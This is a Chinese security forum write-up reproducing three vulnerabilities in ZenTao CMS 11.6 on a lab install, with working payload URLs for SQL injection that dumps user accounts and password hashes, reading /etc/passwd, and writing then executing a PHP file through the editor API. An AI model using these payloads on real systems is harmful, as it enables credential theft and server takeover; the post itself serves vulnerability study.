蝉道 zentaocms漏洞复现

Track-mss   ·   发表于 2021-08-25 11:43:15   ·   CTF&WP专版

0x01 蝉道 zentaocms 11.6 漏洞复现

进入网站,选择开源版

查看版本
http://127.0.0.1/zentao/index.php?mode=getconfig

1、 sql注入

payload:
http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

2、 文件读取

payload:
http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

3、 代码执行

POST请求包发送数据

http://192.168.59.128/zentao/api-getModel-editor-save-filePath=/tmp/123

fileContent=<?php phpinfo()?>

(放在tmp下是因为其他目录可能有权限限制,不一定可以写进去)

查看文件,已被写入

访问123文件:

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123

没有成功,查看源代码,发现需要给物理路径加上一层才可以。

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1

用户名金币积分时间理由
1458376896 8.00 0 2024-02-01 20:08:53 一个受益终生的帖子~~

打赏我,让我更有动力~

1 条回复   |  直到 2021-10-11 | 1957 次浏览

zkaqzh
发表于 2021-10-11

这个是必须要登录才能进行sql注入吧

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.